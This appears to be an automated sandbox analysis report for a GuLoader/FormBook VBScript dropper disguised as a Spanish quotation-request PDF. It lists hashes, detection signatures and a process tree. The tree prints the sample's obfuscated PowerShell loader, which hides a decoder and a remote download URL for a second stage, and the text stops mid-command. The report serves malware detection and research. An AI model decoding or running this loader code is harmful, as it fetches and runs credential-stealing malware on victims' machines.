Edit tour
Windows
Analysis Report
SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs
Overview
General Information
| Sample name: | SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsrenamed because original name is a hash value |
| Original sample name: | SOLICITUD DE COTIZACIN(UG) 03-10-2025pdf.vbs |
| Analysis ID: | 1634239 |
| MD5: | 82d5a3c2056b0fef301c5ecb9dde8faf |
| SHA1: | 25784d9cafad904c2d4e2864eb35002363f63b35 |
| SHA256: | 4c6e38470a18fbf67f4fbf231799dfa50937aa6a543a1c4cbe48fc1ea657dcfb |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7496 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\SOLIC ITUD DE CO TIZACI#U00 d3N(UG) 03 -10-2025#U 00b7pdf.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
PING.EXE (PID: 7624 cmdline: ping Host_ 6637.6637. 6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D) 
conhost.exe (PID: 7656 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 1488 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $Sir upperne; f unction Ru ndingers($ Frygtet){$ Totalafhol dsmndenes= 4;do{$Utop ographer+= $Frygtet[$ Totalafhol dsmndenes] ;$Totalafh oldsmndene s+=5;$Flos s=Format-L ist} until (!$Frygtet [$Totalafh oldsmndene s])$Utopog rapher}fun ction Exal tative($Sk riv){ .($M onoprionid ian) ($Skr iv)}$Gylpe nes=Rundin gers ',end NMed E Raa TBrug.fron w';$Gylpen es+=Rundin gers 'Time e ,rsbLder CLng lTran I AsseP st N Envt';$G ensidige=R undingers 'D ciM Bid oBiblz Fri iE.ecl La. l Fera ha /';$Turf=R undingers 'bjniTBald l dogsLand 1Ecty2';$D opingens=' Rens[C ten P oe ddat Prea. B,dS TopdER har PhilV haIS ervCTidseM antpAlano. ervi ndiNR ebetAbdimH allas,emn OvoaHis.gA r.iE VikR. wel]Heat: Nem:unshsV erseReklcD e.ruSkonR, edsIChazTe xscYBritP r.vrthumOF la t GitoA naucGlobOA fkol,ept=i nte$Su,kts pa.uSkrmrl ockF';$Gen sidige+=Ru ndingers ' Beha5Fold. Ste0,ive fors(AktiW estiUdfln DoktdSanso Undsw apas Til AfklN He TSyne Vejn1Dist0 Neos.Deka0 Li j; Ret KlebWPupii EloknYayb6 F uo4Mark; Tart m.ttx Spor6Loc 4 Vite;U do Lystr Sa,v Lab,:Prod1 Come3Mant4 Ra e.Bomb0 sani)En a Leg G Kave Ub,tcAngrk Insopor./ .rea2Macr0 Str,1U,de0 Supe0Zinc1 Yach0Bred1 alab R tFT ikhiHurtr riheNordf ongoLastxL gtn/H,pn1S .rp3Unde4U rin.Grad0' ;$Mellemte kst=Rundin gers 'freu u nisDarae Super S.l- UdslAimprG DisE Kron NoniT';$Af skrabede=R undingers 'Per.hKbin tK,ittpoli pAn esH,nd :Band/Opda /Pawkd Ska rTraniApor v ampeElem .kpengRest o eneo kok geaenlSpor eNonf.Copu cKer oRese mPre /Depi uRececpret ?SkaaeSym, xBugbp Ora oAdvorBaks tHect= L.s dSc ooS xe wGenen Ab lUpstoVagi aRed dPaup &Kvi iPsal dMiss= Dag 1 BedGFlak fbourxS re 5Antac ,ru cSt gU Da. z RicPChr qArc 6H pe ETra R.kvi GVallr Unf OKortqTekn CSnitKEnsi 4 AnasR gn KIrefqRver R Ulig Afg yFlaa9Kalk UEmu w t,r 6Bixb8Hjor 4';$Pyroto xin=Rundin gers ' Gas >';$Monopr ionidian=R undingers ' debITheo E fo,X';$U nderbevell ing='Heste stutterier ';$Thyrost raca='\Lin ieskifte.R ig';Exalta tive (Rund ingers ' S .j$chemgKr oplInciOra spBSadeASg .nlIm.r: P endMisteSk rinUnsyU A bsdSietiUn coNBrinGMa gn=.mpr$ A dveBregnAj ugvS or:Se k aFlamp G enp urgdLy staElecT . araTing+Lo ch$MusitDi k,H BufYSp dRSterORi gtSBreftDr t RDelfAI ric ad.a') ;Exaltativ e (Runding ers ' for$ atugByggL pulOTil B S riAFrokl cit :,abaD arpOYau.m GenaiLsn,N oiniB ctk Gelda ,liN Sys s m fk PusheFl v= Hexa$Vap a K llfSmaaS Ru dKSjleR JazzAUnlyB HoveEkonfd Tilsetric. SekssAd,lP StilLRotui MelaTa,ti( Bejl$NevyP MarkY lacR Stero Uget D leo Balx Mutai U cn delt)');Ex altative ( Rundingers $Dopingen s);$Afskra bede=$Domi nikanske[0 ];$tobiser =(Rundinge rs 'di,t$L andGReseLA